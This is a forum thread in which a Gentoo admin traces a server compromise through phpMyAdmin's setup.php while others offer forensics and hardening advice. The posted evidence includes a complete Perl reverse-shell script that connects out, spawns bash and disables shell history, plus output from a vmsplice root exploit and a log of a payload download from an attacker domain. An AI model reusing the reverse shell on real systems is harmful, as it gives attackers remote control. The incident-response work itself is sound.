Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
Found ./exploit running as apache
View unanswered posts
View posts from last 24 hours

 
Reply to topic    Gentoo Forums Forum Index Networking & Security
View previous topic :: View next topic  
Author Message
newtonian
Guru
Guru


Joined: 19 Jan 2005
Posts: 465
Location: Hokkaido Japan

PostPosted: Fri Aug 06, 2010 8:02 am    Post subject: Found ./exploit running as apache Reply with quote

after apache becoming non-responsive I did a htop and found that
apache running from ./exploit was using up all of the cpu

I killed the processes and all was fine. I did a find -name exploit -print from the root
directory, hoping to find a file called exploit but nothing came up.
Code:

apache    2128 52.8  0.2  34028  3812 ?        R    Aug04 2039:58 /usr/sbin/apache/logs
apache    4302 61.4  0.1  21232  1732 ?        R    Aug03 3207:05 ./exploit
root      4779  0.0  0.0   7272   732 pts/3    R+   16:21   0:00 grep --colour=auto apache
apache   22869 57.8  0.1  21232  1732 ?        R    Aug03 2707:47 ./exploit


Anyone familiar with apache running a file called exploit?

Cheers,
Back to top
View user's profile Send private message
msalerno
Veteran
Veteran


Joined: 17 Dec 2002
Posts: 1338
Location: Sweating in South Florida

PostPosted: Fri Aug 06, 2010 4:08 pm    Post subject: Reply with quote

Who knows where it came from, but you are going to get lots of people telling you to wipe the box and reinstall. You should have tried to get more info about the process before you killed it.
Back to top
View user's profile Send private message
d2_racing
Bodhisattva
Bodhisattva


Joined: 25 Apr 2005
Posts: 13047
Location: Ste-Foy,Canada

PostPosted: Fri Aug 06, 2010 4:57 pm    Post subject: Reply with quote

Indeed, now that the process is gone, maybe there a way to find more info about that exploit file.
Back to top
View user's profile Send private message
msalerno
Veteran
Veteran


Joined: 17 Dec 2002
Posts: 1338
Location: Sweating in South Florida

PostPosted: Fri Aug 06, 2010 5:22 pm    Post subject: Reply with quote

Your situation inspired me to writeup the following post:

https://forums.gentoo.org/viewtopic-p-6378504.html
Back to top
View user's profile Send private message
Anarcho
Advocate
Advocate


Joined: 06 Jun 2004
Posts: 2967
Location: Germany

PostPosted: Fri Aug 06, 2010 5:23 pm    Post subject: Reply with quote

And maybe it would've been better to really kill (kill -9) the process as there might be a signal handler which deletes the file on SIGTERM.

But you should really try to find out through which way the exploit have been uploaded to your filesystem. After that, reinstall the server and fix the problem!
_________________
...it's only Rock'n'Roll, but I like it!
Back to top
View user's profile Send private message
Hu
Moderator
Moderator


Joined: 06 Mar 2007
Posts: 16043

PostPosted: Fri Aug 06, 2010 11:19 pm    Post subject: Reply with quote

As an addendum, if you want to stop the process, hit it with a SIGSTOP first. That cannot be blocked, so unless it has a buddy to resume it, it will suspend in response to that. After it is suspended, you can do initial forensics, and kill the process with a SIGKILL when you are done. It may have unlinked itself upon startup, which would make it more difficult to get at the underlying program.

In the meantime, check your Apache access and error logs. Perhaps you will get lucky and find what was used to upload the exploit bootstrap code.
Back to top
View user's profile Send private message
newtonian
Guru
Guru


Joined: 19 Jan 2005
Posts: 465
Location: Hokkaido Japan

PostPosted: Wed Aug 11, 2010 12:52 pm    Post subject: thanks for all of the awesome responses Reply with quote

Thanks for all of the awesome responses.

I found the same process running on another machine. Here is the output of msalerno's guide:
https://forums.gentoo.org/viewtopic-p-6378504.html

Code:
lsof -p 22533
COMMAND   PID   USER   FD      TYPE             DEVICE      SIZE     NODE NAME
exploit 22533 apache  cwd       DIR                8,4         0  4317251 /var/tmp/xpl/32 (deleted)
exploit 22533 apache  rtd       DIR                8,4      4096        2 /
exploit 22533 apache  txt       REG                8,4     32618  4317256 /var/tmp/xpl/32/exploit (deleted)
exploit 22533 apache  mem       REG                8,4    114952  1220694 /lib64/ld-2.6.1.so
exploit 22533 apache  mem       REG                8,4     14528  1220708 /lib64/libdl-2.6.1.so
exploit 22533 apache  mem       REG                8,4   1293456  1220702 /lib64/libc-2.6.1.so
exploit 22533 apache  DEL       REG                8,4            4317260 /var/tmp/xpl/32/exp_cheddarbay.so
exploit 22533 apache  DEL       REG                8,4            4317332 /var/tmp/xpl/32/exp_ingom0wnar.so
exploit 22533 apache  DEL       REG                8,4            4317327 /var/tmp/xpl/32/exp_moosecox.so
exploit 22533 apache  DEL       REG                8,4            4317282 /var/tmp/xpl/32/exp_paokara.so
exploit 22533 apache  DEL       REG                8,4            4317259 /var/tmp/xpl/32/exp_powerglove.so
exploit 22533 apache  DEL       REG                8,4            4317281 /var/tmp/xpl/32/exp_therebel.so
exploit 22533 apache  DEL       REG                8,4            4317258 /var/tmp/xpl/32/exp_wunderbar.so
exploit 22533 apache    0u     sock                0,4           48181637 can't identify protocol
exploit 22533 apache    1u     sock                0,4           48181637 can't identify protocol
exploit 22533 apache    2u     sock                0,4           48181637 can't identify protocol
exploit 22533 apache    3w     FIFO                0,5           48181633 pipe
exploit 22533 apache    4u     IPv4           47576424                TCP *:http (LISTEN)
exploit 22533 apache    5r     FIFO                0,5           47576437 pipe
exploit 22533 apache    6w     FIFO                0,5           47576437 pipe
exploit 22533 apache    7w      REG                8,4      1281  3875216 /var/log/apache2/ssl_error_log
exploit 22533 apache    8w      REG                8,4 340378372  3876416 /var/log/apache2/access_log
exploit 22533 apache    9w      REG                8,4      2866  3875215 /var/log/apache2/ssl_access_log
exploit 22533 apache   10w      REG                8,4      3268  3875217 /var/log/apache2/ssl_request_log
exploit 22533 apache   11w      REG                8,4         0  4440068 /var/run/ssl_mutex (deleted)
exploit 22533 apache   12w      REG                8,4 808690834  3875212 /var/log/apache2/mod_jk.log
exploit 22533 apache   13u      REG                8,4     28800  3876429 /var/log/apache2/mod_jk.shm.22136 (deleted)
exploit 22533 apache   14u      REG                8,4         1  3876438 /var/log/apache2/mod_jk.shm.22136.lock (deleted)
exploit 22533 apache   15r     0000                0,9         0 47593281 eventpoll
exploit 22533 apache   16u     sock                0,4           47625594 can't identify protocol
exploit 22533 apache   17u     IPv4           47601843                TCP server.domain.com:33369->server.domain.com:8009 (CLOSE_WAIT)
exploit 22533 apache   18u     unix 0xffff8800711796c0           47598822 socket
exploit 22533 apache   19w     FIFO                0,5           48372130 pipe
exploit 22533 apache   21w  unknown                                       /proc/22533/fd/21 (readlink: No such file or directory)


Code:
dr-xr-xr-x   5 apache apache 0 Aug 11 13:35 .
dr-xr-xr-x 156 root   root   0 Apr 22 18:52 ..
dr-xr-xr-x   2 apache apache 0 Aug 11 16:19 attr
-r--------   1 apache apache 0 Aug 11 16:19 auxv
-r--r--r--   1 apache apache 0 Aug 11 16:18 cmdline
lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 cwd -> /var/tmp/xpl/32 (deleted)
-r--------   1 apache apache 0 Aug 11 16:19 environ
lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 exe -> /var/tmp/xpl/32/exploit (deleted)
dr-x------   2 apache apache 0 Aug 11 13:36 fd
-r--r--r--   1 apache apache 0 Aug 11 16:18 maps
-rw-------   1 apache apache 0 Aug 11 16:19 mem
-r--r--r--   1 apache apache 0 Aug 11 16:19 mounts
-r--------   1 apache apache 0 Aug 11 16:19 mountstats
-rw-r--r--   1 apache apache 0 Aug 11 16:19 oom_adj
-r--r--r--   1 apache apache 0 Aug 11 16:19 oom_score
lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 root -> /
-rw-------   1 apache apache 0 Aug 11 16:19 seccomp
-r--r--r--   1 apache apache 0 Aug 11 16:19 smaps
-r--r--r--   1 apache apache 0 Aug 11 16:18 stat
-r--r--r--   1 apache apache 0 Aug 11 16:19 statm
-r--r--r--   1 apache apache 0 Aug 11 16:18 status
dr-xr-xr-x   3 apache apache 0 Aug 11 13:35 task
-r--r--r--   1 apache apache 0 Aug 11 16:19 wchan


strace -p 22533 reported this:
Code:

pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21, 21])                          = 0
Process 22533 detached


Code:
echo CWD `readlink /proc/22533/cwd` > ~/procinfo.log
cat ~/procinfo.log
CWD /var/tmp/xpl/32 (deleted)


Code:
 cat /proc/22533/cmdline
./exploit


Code:
 cat /proc/22533/environ
SHELL=/bin/shDEFAULTLEVEL=defaultLC_ALL=en_US.UTF-8USER=rootPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/bin:/binPWD=/var/tmp/xpl/32LANG=en_US.UTF-8BOOTLEVEL=bootSVCNAME=apache2CONSOLETYPE=serialSHLVL=5HOME=/rootSOFTLEVEL=default_=./exploit


I got lost from cat /proc/<pid of process>/ as that is a directory on my system and I couldn't find any tar files around.

lsof -p 22533 shows a few source files which a google search reveals that this is the enlightenment hack. More googling led me to look in /var/tmp/

Code:
ls -la /var/tmp/
total 366468
drwxrwxrwt  5 root     root          4096 Aug  4 15:23 .
drwxr-xr-x 17 root     root          4096 Mar 14 02:51 ..
-rw-r--r--  1 apache   apache         317 Aug  4 15:21 1.txt
-rw-r--r--  1 apache   apache         317 Aug  4 15:22 2.txt
-rw-r--r--  1 apache   apache         317 Aug  4 15:23 3.txt
-rw-r--r--  1 apache   apache         892 Nov  6  2009 back.txt
drwxrwxr-x  2 portage  portage       4096 Jun  2 13:16 binpkgs
drwxrwxr-x  4 portage  portage       4096 Aug 11 15:38 portage
drwxrwxr-x  3 tomcat   tomcat        4096 Aug 10 22:56 tomcat-6
-rwxr-xr-x  1 apache   apache       10393 Feb  4  2010 vmsplic3


Code:
cat back.txt
#!/usr/bin/perl
use IO::Socket;
$system    = '/bin/bash';
$ARGC=@ARGV;
print "--== Fucking Machine ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Spawning Shell \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Thuraya Team ==--  \n\n";
system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);


Code:
 cat 1.txt 2.txt 3.txt
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xf7e52000 .. 0xf7e84000
[-] wtf
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xf7e6f000 .. 0xf7ea1000
[-] wtf
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xf7e65000 .. 0xf7e97000
[-] wtf


found this in the error log:

Code:
--2010-08-04 00:00:11--  http://smenar.do.am/fuck.txt
Resolving smenar.do.am... 195.216.243.36
Connecting to smenar.do.am|195.216.243.36|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17247 (17K) [text/plain]
Saving to: `fuck.txt'

     0K .......... ......                                     100% 24.6K=0.7s

2010-08-04 00:00:13 (24.6 KB/s) - `fuck.txt' saved [17247/17247]


looked for the file on the machine but it didn't exist.

Here is the call that uploaded the file to the server:
Code:

myserverip 66.7.208.173 - - [04/Aug/2010:00:00:17 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14060 "http://210.48.255.38/phpmyadmin/scripts/setup.php" "Opera"
- 127.0.0.1 - - [04/Aug/2010:00:00:18 +0900] "OPTIONS * HTTP/1.0" 200 - "-" "Apache (internal dummy connection)"


Code:
 emerge --search phpmyadmin
Searching...
[ Results for search key : phpmyadmin ]
[ Applications found : 1 ]

*  dev-db/phpmyadmin
      Latest version available: 2.11.10
      Latest version installed: 2.11.9.4
      Size of files: 2,172 kB
      Homepage:      http://www.phpmyadmin.net/
      Description:   Web-based administration for MySQL database in PHP
      License:       GPL-2


I'm not sure how they hacked through phpadmin setup.php as I don't have a config directory. I'll have to look for other hacks.
None of the files seem modified.

Code:
ls -l /var/www/localhost/htdocs/phpmyadmin/
total 1456
-rw-r--r--  2 root root  10873 2009-01-25 21:02 browse_foreigners.php
-rw-r--r--  2 root root    758 2009-01-25 21:02 calendar.php
-rw-r--r--  2 root root  31282 2009-01-25 21:02 ChangeLog
-rw-r--r--  2 root root   3459 2009-01-25 21:02 changelog.php
-rw-r--r--  2 root root    460 2009-01-25 21:02 chk_rel.php
-rw-r--r--  1 root root   1749 2009-01-25 21:09 config.inc.php
-rw-r--r--  2 root root   1751 2009-01-25 21:02 config.sample.inc.php
drwxr-xr-x  3 root root   4096 2009-01-25 21:02 contrib
-rw-r--r--  2 root root   1470 2009-01-25 21:02 db_create.php
-rw-r--r--  2 root root  10681 2009-01-25 21:02 db_datadict.php
-rw-r--r--  2 root root   2475 2009-01-25 21:02 db_export.php
-rw-r--r--  2 root root    471 2009-01-25 21:02 db_import.php
-rw-r--r--  2 root root  19871 2009-01-25 21:02 db_operations.php
-rw-r--r--  2 root root   7422 2009-01-25 21:02 db_printview.php
-rw-r--r--  2 root root  34751 2009-01-25 21:02 db_qbe.php
-rw-r--r--  2 root root  13999 2009-01-25 21:02 db_search.php
-rw-r--r--  2 root root    999 2009-01-25 21:02 db_sql.php
-rw-r--r--  2 root root  22432 2009-01-25 21:02 db_structure.php
-rw-r--r--  2 root root   4583 2009-01-25 21:02 docs.css
-rw-r--r--  2 root root 222262 2009-01-25 21:02 Documentation.html
-rw-r--r--  2 root root 157063 2009-01-25 21:02 Documentation.txt
-rw-r--r--  2 root root   2167 2009-01-25 21:02 error.php
-rw-r--r--  2 root root  24843 2009-01-25 21:02 export.php
-rw-r--r--  2 root root  18902 2009-01-25 21:02 favicon.ico
-rw-r--r--  2 root root  13934 2009-01-25 21:02 import.php
-rw-r--r--  2 root root   6586 2009-01-25 21:02 index.php
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 js
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 lang
drwxr-xr-x 10 root root   4096 2009-01-25 21:21 libraries
-rw-r--r--  2 root root    411 2009-01-25 21:02 license.php
-rw-r--r--  2 root root  15889 2009-01-25 21:02 main.php
-rw-r--r--  2 root root  26259 2009-01-25 21:02 navigation.php
-rw-r--r--  2 root root  27182 2009-01-25 21:02 pdf_pages.php
-rw-r--r--  2 root root  52735 2009-01-25 21:02 pdf_schema.php
-rw-r--r--  2 root root    360 2009-01-25 21:02 phpinfo.php
-rw-r--r--  2 root root  16613 2009-01-25 21:02 phpmyadmin.css.php
drwxr-xr-x  5 root root   4096 2009-01-25 21:02 pmd
-rw-r--r--  2 root root  11227 2009-01-25 21:02 pmd_common.php
-rw-r--r--  2 root root   1917 2009-01-25 21:02 pmd_display_field.php
-rw-r--r--  2 root root  18486 2009-01-25 21:02 pmd_general.php
-rw-r--r--  2 root root    880 2009-01-25 21:02 pmd_help.php
-rw-r--r--  2 root root   3372 2009-01-25 21:02 pmd_pdf.php
-rw-r--r--  2 root root   3942 2009-01-25 21:02 pmd_relation_new.php
-rw-r--r--  2 root root   1901 2009-01-25 21:02 pmd_relation_upd.php
-rw-r--r--  2 root root   2248 2009-01-25 21:02 pmd_save_pos.php
-rw-r--r--  2 root root   1063 2009-01-25 21:02 print.css
-rw-r--r--  2 root root   9722 2009-01-25 21:02 querywindow.php
-rw-r--r--  2 root root    403 2009-01-25 21:02 readme.php
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 scripts
-rw-r--r--  2 root root   7653 2009-01-25 21:02 server_binlog.php
-rw-r--r--  2 root root   2784 2009-01-25 21:02 server_collations.php
-rw-r--r--  2 root root  13284 2009-01-25 21:02 server_databases.php
-rw-r--r--  2 root root   4917 2009-01-25 21:02 server_engines.php
-rw-r--r--  2 root root   1639 2009-01-25 21:02 server_export.php
-rw-r--r--  2 root root    486 2009-01-25 21:02 server_import.php
-rw-r--r--  2 root root 110708 2009-01-25 21:02 server_privileges.php
-rw-r--r--  2 root root   2869 2009-01-25 21:02 server_processlist.php
-rw-r--r--  2 root root    581 2009-01-25 21:02 server_sql.php
-rw-r--r--  2 root root  20731 2009-01-25 21:02 server_status.php
-rw-r--r--  2 root root   2462 2009-01-25 21:02 server_variables.php
-rw-r--r--  2 root root    317 2009-01-25 21:02 show_config_errors.php
-rw-r--r--  2 root root  29485 2009-01-25 21:02 sql.php
-rw-r--r--  2 root root   9097 2009-01-25 21:02 tbl_addfield.php
-rw-r--r--  2 root root   9463 2009-01-25 21:02 tbl_alter.php
-rw-r--r--  2 root root  46319 2009-01-25 21:02 tbl_change.php
-rw-r--r--  2 root root   9322 2009-01-25 21:02 tbl_create.php
-rw-r--r--  2 root root   2594 2009-01-25 21:02 tbl_export.php
-rw-r--r--  2 root root    635 2009-01-25 21:02 tbl_import.php
-rw-r--r--  2 root root  15997 2009-01-25 21:02 tbl_indexes.php
-rw-r--r--  2 root root   2186 2009-01-25 21:02 tbl_move_copy.php
-rw-r--r--  2 root root  19804 2009-01-25 21:02 tbl_operations.php
-rw-r--r--  2 root root  18270 2009-01-25 21:02 tbl_printview.php
-rw-r--r--  2 root root  24311 2009-01-25 21:02 tbl_relation.php
-rw-r--r--  2 root root  12626 2009-01-25 21:02 tbl_replace.php
-rw-r--r--  2 root root   4423 2009-01-25 21:02 tbl_row_action.php
-rw-r--r--  2 root root  17905 2009-01-25 21:02 tbl_select.php
-rw-r--r--  2 root root    939 2009-01-25 21:02 tbl_sql.php
-rw-r--r--  2 root root  34710 2009-01-25 21:02 tbl_structure.php
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 test
drwxr-xr-x  4 root root   4096 2009-01-25 21:02 themes
-rw-r--r--  2 root root   1096 2009-01-25 21:02 themes.php
-rw-r--r--  2 root root   1752 2009-01-25 21:02 transformation_overview.php
-rw-r--r--  2 root root   4068 2009-01-25 21:02 transformation_wrapper.php
-rw-r--r--  2 root root   8209 2009-01-25 21:02 translators.html
-rw-r--r--  2 root root   3573 2009-01-25 21:02 user_password.php
-rw-r--r--  2 root root   4215 2009-01-25 21:02 view_create.php


So now I have to figure out how they got into via phpmyadmin setup.php, what and where fuck.txt is and whether or not the vmsplice Local Root Exploit works on this xen kernel. Then rebuild the machine from scratch. : P Ouch...

Thanks for all the help so far guys.

Cheers,
Back to top
View user's profile Send private message
Anon-E-moose
Advocate
Advocate


Joined: 23 May 2008
Posts: 4897
Location: Dallas area

PostPosted: Wed Aug 11, 2010 1:36 pm    Post subject: Reply with quote

I don't run phpmyadmin, but for anything that I don't want the world to see,
I keep localhost separate under /var/www/ and
put things that I don't want the world to know about there..
_________________
PRIME x570-pro, 3700x, RX 550 - 5.8 zen kernel
Acer E5-575 (laptop), i3-7100u - i965 - 5.5 zen kernel
---both---
gcc 9.3.0, profile 17.1 (no-pie & modified) amd64-no-multilib, eudev, openrc, openbox, palemoon
Back to top
View user's profile Send private message
msalerno
Veteran
Veteran


Joined: 17 Dec 2002
Posts: 1338
Location: Sweating in South Florida

PostPosted: Wed Aug 11, 2010 5:11 pm    Post subject: Reply with quote

Have you checked the phpmyadmin site to see if there are any security issues with the version you are running?

You could also do a "glsa-check --test all" and see what gets returned.
Back to top
View user's profile Send private message
Hu
Moderator
Moderator


Joined: 06 Mar 2007
Posts: 16043

PostPosted: Thu Aug 12, 2010 2:21 am    Post subject: Re: thanks for all of the awesome responses Reply with quote

newtonian wrote:
More googling led me to look in /var/tmp/
Code:
ls -la /var/tmp/
total 366468
drwxrwxrwt  5 root     root          4096 Aug  4 15:23 .
drwxr-xr-x 17 root     root          4096 Mar 14 02:51 ..
-rw-r--r--  1 apache   apache         317 Aug  4 15:21 1.txt
-rw-r--r--  1 apache   apache         317 Aug  4 15:22 2.txt
-rw-r--r--  1 apache   apache         317 Aug  4 15:23 3.txt
-rw-r--r--  1 apache   apache         892 Nov  6  2009 back.txt
drwxrwxr-x  2 portage  portage       4096 Jun  2 13:16 binpkgs
drwxrwxr-x  4 portage  portage       4096 Aug 11 15:38 portage
drwxrwxr-x  3 tomcat   tomcat        4096 Aug 10 22:56 tomcat-6
-rwxr-xr-x  1 apache   apache       10393 Feb  4  2010 vmsplic3
Some of those suspicious files have rather old mtimes. This is not definitive since an mtime can be changed to an arbitrary value at will, but it could mean that you have been successfully attacked some time ago.

PHP is a frequent source of security problems. I suggest making some changes on the rebuilt server to restrict access to it. Make at least one of these changes, if at all possible. Layering several together is probably overkill, but has no significant technical drawbacks.
  • If possible, serve it from a VirtualHost that listens only to localhost.
  • Use Apache configuration directives to require HTTP-based authentication to access any file in the phpmyadmin directory hierarchy. This will provide some basic protection if an authentication bypass is found in phpmyadmin, since the attacker must still have a valid HTTP login to get past the Apache check.
  • Require HTTPS to access the site that serves phpmyadmin. This protects the credentials from the previous bullet, and may also cause some attackers to miss the presence of the directory if they probe only sites served over HTTP.
  • Install to a directory with a non-standard name, such as /admin.2eD6pw/phpmyadmin/ and do not provide any publicly readable hyperlinks that point to this directory. Choose the upper level directory name by combining a useful string ("admin") with a random string (to discourage guessing). This is a crude form of security by obscurity, but it should prevent bots from just wandering in.
Back to top
View user's profile Send private message
Anon-E-moose
Advocate
Advocate


Joined: 23 May 2008
Posts: 4897
Location: Dallas area

PostPosted: Thu Aug 12, 2010 10:10 am    Post subject: Reply with quote

I would also lock down the directories and any password or other sensitive files from being read.
I used vhosts on my system, with separate directories for localhost and my dns name.
_________________
PRIME x570-pro, 3700x, RX 550 - 5.8 zen kernel
Acer E5-575 (laptop), i3-7100u - i965 - 5.5 zen kernel
---both---
gcc 9.3.0, profile 17.1 (no-pie & modified) amd64-no-multilib, eudev, openrc, openbox, palemoon
Back to top
View user's profile Send private message
Tony Schwartz
n00b
n00b


Joined: 10 Nov 2010
Posts: 1

PostPosted: Wed Nov 10, 2010 2:32 pm    Post subject: solution for me Reply with quote

I tracked this down to a known exploit in phpMyAdmin.
The problem for me was that I did not remove the setup.php script from the scripts directory in the phpMyAdmin installation.
There is a known exploit that is described here: http://www.nessus.org/plugins/index.php?view=single&id=48908

The problem allows an attacker to execute arbitrary PHP code.

For me, it was pretty easy to clean the components of this problem by removing the scripts from the /tmp directory that were generated. see the .mysql.log directory and any other scripts in the tmp directory. kill apache, make sure your phpMyAdmin doesn't have a setup.php script and make sure all your httpd processes are dead, and the /usr/sbin/apache/*** processes are dead too. Then, safely restart httpd.

Hope this helps.

T
Back to top
View user's profile Send private message
molot
Apprentice
Apprentice


Joined: 26 Feb 2005
Posts: 214
Location: Warsaw, Poland

PostPosted: Wed Nov 10, 2010 7:15 pm    Post subject: Reply with quote

Depending on your php settings, "arbitrary php code" might be enough to setup other backdoor. Hardly possible, but possible. Check twice for any traces of edits like that.
Hope you'll be OK.
_________________
"I just have to run faster than the slowest party member"
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Networking & Security All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum